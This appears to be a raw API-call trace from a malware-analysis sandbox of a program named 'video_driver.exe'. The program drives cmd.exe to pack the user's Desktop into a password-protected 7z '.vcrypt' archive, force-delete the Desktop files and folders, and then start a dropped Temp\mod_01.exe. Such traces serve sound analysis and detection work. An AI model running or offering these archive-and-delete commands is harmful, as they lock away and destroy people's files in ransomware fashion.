[0057.294] ferror (_File=0x77032960) returned 0 [0057.294] fgets (in: _Buf=0x7c4ab5, _MaxCount=651, _File=0x77032960 | out: _Buf="ZToX37-PbNpvd.pps\r\n", _File=0x77032960) returned="ZToX37-PbNpvd.pps\r\n" [0057.294] feof (_File=0x77032960) returned 0 [0057.294] ferror (_File=0x77032960) returned 0 [0057.294] fgets (in: _Buf=0x7c4ac8, _MaxCount=632, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0057.301] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 0 [0057.302] GetProcessHeap () returned 0x7b0000 [0057.303] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c4938, Size=0x31c) returned 0x7c4938 [0057.303] GetProcessHeap () returned 0x7b0000 [0057.303] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c4938) returned 0x31c [0057.303] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7c4ac8, cbMultiByte=392, lpWideCharStr=0x7c4940, cchWideChar=392 | out: lpWideCharStr="47Upt ff5iyL.avi\r\n8v1Sb42C0-_SO.xls\r\n8ZRp Yo.mp4\r\nbuFx.bmp\r\nFJg6m_dnHXJPIeQU.pps\r\nHjb-m4EYHMa7GTDEF.doc\r\nHMYVWNui_rNMPXSZ.bmp\r\ni0eSQ.mp3\r\nisH8zy.flv\r\nKaGXpX_uv.docx\r\nKGvZ520tJ.ods\r\nmcjVmrm7V7AJ6t.odt\r\nmfZck7HwXf4SziBj\r\nmoG2C7rzW\r\nn8BHx-R0jAFi.mkv\r\nnF mzbmLsvv0e1OlZm.gif\r\nq8JQsFRXk.mp4\r\nRlpYGAIBP9RiAuiDEA1C.bmp\r\nvideo_driver.exe\r\nvvdZxZXGy537svJ.mp4\r\nYt6rrVQUgdZ1oPy.gif\r\nZToX37-PbNpvd.pps\r\n") returned 392 [0057.303] GetProcessHeap () returned 0x7b0000 [0057.303] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7c85f0 [0057.303] GetProcessHeap () returned 0x7b0000 [0057.303] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c85f0, Size=0xd0) returned 0x7c85f0 [0057.303] GetProcessHeap () returned 0x7b0000 [0057.303] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c85f0) returned 0xd0 [0057.303] GetProcessHeap () returned 0x7b0000 [0057.304] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7c86c8 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c86c8, Size=0x2a8) returned 0x7c86c8 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c86c8) returned 0x2a8 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7c8978 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c8978, Size=0x18) returned 0x7c8978 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c8978) returned 0x18 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7c8998 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c8998, Size=0xd8) returned 0x7c8998 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c8998) returned 0xd8 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7c8a78 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c8a78, Size=0xb0) returned 0x7c8a78 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c8a78) returned 0xb0 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7c8b30 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c8b30, Size=0x20) returned 0x7c8b30 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c8b30) returned 0x20 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7c8b58 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c8b58, Size=0x38) returned 0x7c8b58 [0057.304] GetProcessHeap () returned 0x7b0000 [0057.304] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c8b58) returned 0x38 [0057.305] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3ef2f4 | out: _Buffer="\r\n") returned 2 [0057.305] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.305] GetFileType (hFile=0x7) returned 0x2 [0057.305] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.305] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef2b4 | out: lpMode=0x3ef2b4) returned 1 [0057.305] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.305] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ef2e0, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef2e0*=0x2) returned 1 [0057.306] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0057.306] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.306] _vsnwprintf (in: _Buffer=0x4a415e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3ef2f0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0057.306] _vsnwprintf (in: _Buffer=0x4a415e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3ef2f0 | out: _Buffer=">") returned 1 [0057.306] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.306] GetFileType (hFile=0x7) returned 0x2 [0057.306] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.306] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef2b8 | out: lpMode=0x3ef2b8) returned 1 [0057.307] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.307] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a415e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3ef2e4, lpReserved=0x0 | out: lpBuffer=0x4a415e40*, lpNumberOfCharsWritten=0x3ef2e4*=0x26) returned 1 [0057.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.308] GetFileType (hFile=0x7) returned 0x2 [0057.308] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.308] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef50c | out: lpMode=0x3ef50c) returned 1 [0057.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.309] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7c85f8*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x3ef538, lpReserved=0x0 | out: lpBuffer=0x7c85f8*, lpNumberOfCharsWritten=0x3ef538*=0x31) returned 1 [0057.309] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ef544 | out: _Buffer=" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*\" ") returned 168 [0057.309] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.309] GetFileType (hFile=0x7) returned 0x2 [0057.309] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.309] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef504 | out: lpMode=0x3ef504) returned 1 [0057.310] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.310] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0xa8, lpNumberOfCharsWritten=0x3ef530, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef530*=0xa8) returned 1 [0057.310] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x3ef560 | out: _Buffer=" & ") returned 3 [0057.310] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.310] GetFileType (hFile=0x7) returned 0x2 [0057.311] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.311] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef520 | out: lpMode=0x3ef520) returned 1 [0057.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.311] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3ef54c, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef54c*=0x3) returned 1 [0057.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.311] GetFileType (hFile=0x7) returned 0x2 [0057.312] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.312] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4dc | out: lpMode=0x3ef4dc) returned 1 [0057.312] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.312] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7c8980*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3ef508, lpReserved=0x0 | out: lpBuffer=0x7c8980*, lpNumberOfCharsWritten=0x3ef508*=0x3) returned 1 [0057.312] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ef514 | out: _Buffer=" /f /s /q \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 52 [0057.312] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.312] GetFileType (hFile=0x7) returned 0x2 [0057.313] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.313] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4d4 | out: lpMode=0x3ef4d4) returned 1 [0057.313] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.313] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x3ef500, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef500*=0x34) returned 1 [0057.313] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x3ef530 | out: _Buffer=" & ") returned 3 [0057.313] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.313] GetFileType (hFile=0x7) returned 0x2 [0057.314] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.314] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4f0 | out: lpMode=0x3ef4f0) returned 1 [0057.314] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.314] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3ef51c, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef51c*=0x3) returned 1 [0057.314] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x3ef514 | out: _Buffer="FOR") returned 3 [0057.314] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.314] GetFileType (hFile=0x7) returned 0x2 [0057.314] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.314] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4d4 | out: lpMode=0x3ef4d4) returned 1 [0057.315] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.315] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3ef500, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef500*=0x3) returned 1 [0057.315] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format=" %S", _ArgList=0x3ef514 | out: _Buffer=" /") returned 2 [0057.315] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.315] GetFileType (hFile=0x7) returned 0x2 [0057.315] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.315] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4d4 | out: lpMode=0x3ef4d4) returned 1 [0057.316] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.316] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ef500, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef500*=0x2) returned 1 [0057.316] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x3ef514 | out: _Buffer=" %p IN ") returned 7 [0057.316] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.316] GetFileType (hFile=0x7) returned 0x2 [0057.316] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.316] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4d4 | out: lpMode=0x3ef4d4) returned 1 [0057.317] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.317] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x3ef500, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef500*=0x7) returned 1 [0057.317] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x3ef510 | out: _Buffer="(\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*\") do ") returned 47 [0057.317] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.317] GetFileType (hFile=0x7) returned 0x2 [0057.317] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.317] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4d0 | out: lpMode=0x3ef4d0) returned 1 [0057.318] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.318] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x2f, lpNumberOfCharsWritten=0x3ef4fc, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef4fc*=0x2f) returned 1 [0057.318] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.318] GetFileType (hFile=0x7) returned 0x2 [0057.318] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.318] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4dc | out: lpMode=0x3ef4dc) returned 1 [0057.318] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.318] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7c8b38*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x3ef508, lpReserved=0x0 | out: lpBuffer=0x7c8b38*, lpNumberOfCharsWritten=0x3ef508*=0x5) returned 1 [0057.319] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ef514 | out: _Buffer=" \"%p\" /s /q ") returned 12 [0057.319] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.319] GetFileType (hFile=0x7) returned 0x2 [0057.319] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.319] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4d4 | out: lpMode=0x3ef4d4) returned 1 [0057.319] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.319] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x3ef500, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef500*=0xc) returned 1 [0057.320] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3ef594 | out: _Buffer="\r\n") returned 2 [0057.320] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.320] GetFileType (hFile=0x7) returned 0x2 [0057.320] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.320] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef554 | out: lpMode=0x3ef554) returned 1 [0057.320] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.320] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ef580, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef580*=0x2) returned 1 [0057.320] GetConsoleTitleW (in: lpConsoleTitle=0x3ef0a0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0057.321] GetFileAttributesW (lpFileName="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrg~1\\appdata\\local\\temp\\mod_01.exe\"")) returned 0xffffffff [0057.321] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0057.321] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0057.321] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0057.321] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0057.321] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0057.321] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0057.321] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0057.321] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0057.321] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0057.321] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0057.321] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0057.321] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0057.321] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0057.321] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0057.321] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0057.321] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0057.321] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0057.321] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0057.321] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0057.321] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0057.321] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0057.321] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0057.322] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0057.322] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0057.322] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0057.322] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0057.322] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0057.322] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0057.322] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0057.322] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0057.322] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0057.322] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0057.322] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0057.322] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0057.322] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0057.322] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0057.322] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0057.322] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0057.322] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0057.322] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0057.322] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0057.322] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0057.322] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0057.322] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0057.322] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0057.322] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0057.322] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0057.322] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0057.322] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0057.323] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0057.323] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0057.323] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0057.323] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0057.323] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0057.323] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0057.323] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0057.323] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0057.323] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0057.323] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0057.323] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0057.323] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0057.323] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0057.323] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0057.323] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0057.323] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0057.323] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0057.323] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0057.323] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0057.323] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0057.323] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0057.323] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0057.323] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0057.323] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0057.323] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0057.323] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0057.323] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0057.323] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0057.323] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0057.323] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0057.323] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0057.323] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0057.324] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0057.324] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0057.324] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0057.324] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0057.324] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0057.324] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0057.324] GetProcessHeap () returned 0x7b0000 [0057.324] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x210) returned 0x7c4c60 [0057.324] GetProcessHeap () returned 0x7b0000 [0057.324] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x1bc) returned 0x7c4e78 [0057.324] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0057.324] GetProcessHeap () returned 0x7b0000 [0057.324] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x418) returned 0x7c5040 [0057.324] SetErrorMode (uMode=0x0) returned 0x0 [0057.324] SetErrorMode (uMode=0x1) returned 0x0 [0057.325] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x7c5048, lpFilePart=0x3eebc0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpFilePart=0x3eebc0*="Temp") returned 0x24 [0057.325] SetErrorMode (uMode=0x0) returned 0x1 [0057.325] GetProcessHeap () returned 0x7b0000 [0057.325] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c5040, Size=0x68) returned 0x7c5040 [0057.325] GetProcessHeap () returned 0x7b0000 [0057.325] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c5040) returned 0x68 [0057.325] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\.") returned 1 [0057.325] GetProcessHeap () returned 0x7b0000 [0057.325] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7c4718 [0057.325] GetProcessHeap () returned 0x7b0000 [0057.325] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xa4) returned 0x7c50b0 [0057.325] GetProcessHeap () returned 0x7b0000 [0057.325] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c50b0, Size=0x58) returned 0x7c50b0 [0057.325] GetProcessHeap () returned 0x7b0000 [0057.325] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c50b0) returned 0x58 [0057.325] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0057.325] GetProcessHeap () returned 0x7b0000 [0057.325] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xe0) returned 0x7c5110 [0057.328] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c5110, Size=0x76) returned 0x7c5110 [0057.328] GetProcessHeap () returned 0x7b0000 [0057.328] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c5110) returned 0x76 [0057.328] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0057.328] FindFirstFileExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe", fInfoLevelId=0x1, lpFindFileData=0x3ee95c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ee95c) returned 0x7bf7e8 [0057.329] GetProcessHeap () returned 0x7b0000 [0057.329] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x0, Size=0x14) returned 0x7c4778 [0057.329] FindClose (in: hFindFile=0x7bf7e8 | out: hFindFile=0x7bf7e8) returned 1 [0057.329] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0057.329] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0057.329] GetConsoleTitleW (in: lpConsoleTitle=0x3eee34, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0057.329] InitializeProcThreadAttributeList (in: lpAttributeList=0x3eecbc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3eed84 | out: lpAttributeList=0x3eecbc, lpSize=0x3eed84) returned 1 [0057.329] UpdateProcThreadAttribute (in: lpAttributeList=0x3eecbc, dwFlags=0x0, Attribute=0x60001, lpValue=0x3eed7c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3eecbc, lpPreviousValue=0x0) returned 1 [0057.329] 